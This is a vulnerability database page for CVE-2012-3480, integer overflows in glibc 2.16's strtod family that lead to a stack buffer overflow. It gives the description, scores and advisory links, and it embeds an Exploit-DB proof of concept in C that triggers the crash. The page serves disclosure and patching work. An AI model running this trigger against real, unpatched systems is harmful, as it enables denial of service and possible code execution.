CVE-2012-3480 : Detail

CVE-2012-3480

0.09%V3
Local
2012-08-25
08h00 +00:00
2017-06-30
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple integer overflows in the (1) strtod, (2) strtof, (3) strtold, (4) strtod_l, and other unspecified "related functions" in stdlib in GNU C Library (aka glibc or libc6) 2.16 allow local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long string, which triggers a stack-based buffer overflow.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 37631

Publication date : 2012-08-12 22h00 +00:00
Author : Joseph S. Myer
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/54982/info GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. include <stdio.h> #include <stdlib.h> #include <string.h> #define EXPONENT "e-2147483649" #define SIZE 214748364 int main (void) { char *p = malloc (1 + SIZE + sizeof (EXPONENT)); if (p == NULL) { perror ("malloc"); exit (EXIT_FAILURE); } p[0] = '1'; memset (p + 1, '0', SIZE); memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT)); double d = strtod (p, NULL); printf ("%a\n", d); exit (EXIT_SUCCESS); }

Products Mentioned

Configuraton 0

Gnu>>Glibc >> Version 2.16

References

http://www.openwall.com/lists/oss-security/2012/08/13/4
Tags : mailing-list, x_refsource_MLIST
http://osvdb.org/84710
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/54982
Tags : vdb-entry, x_refsource_BID
http://www.openwall.com/lists/oss-security/2012/08/13/6
Tags : mailing-list, x_refsource_MLIST
http://rhn.redhat.com/errata/RHSA-2012-1325.html
Tags : vendor-advisory, x_refsource_REDHAT
http://rhn.redhat.com/errata/RHSA-2012-1262.html
Tags : vendor-advisory, x_refsource_REDHAT
https://security.gentoo.org/glsa/201503-04
Tags : vendor-advisory, x_refsource_GENTOO
http://rhn.redhat.com/errata/RHSA-2012-1207.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securitytracker.com/id?1027374
Tags : vdb-entry, x_refsource_SECTRACK
http://www.ubuntu.com/usn/USN-1589-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/50201
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/50422
Tags : third-party-advisory, x_refsource_SECUNIA
http://rhn.redhat.com/errata/RHSA-2012-1208.html
Tags : vendor-advisory, x_refsource_REDHAT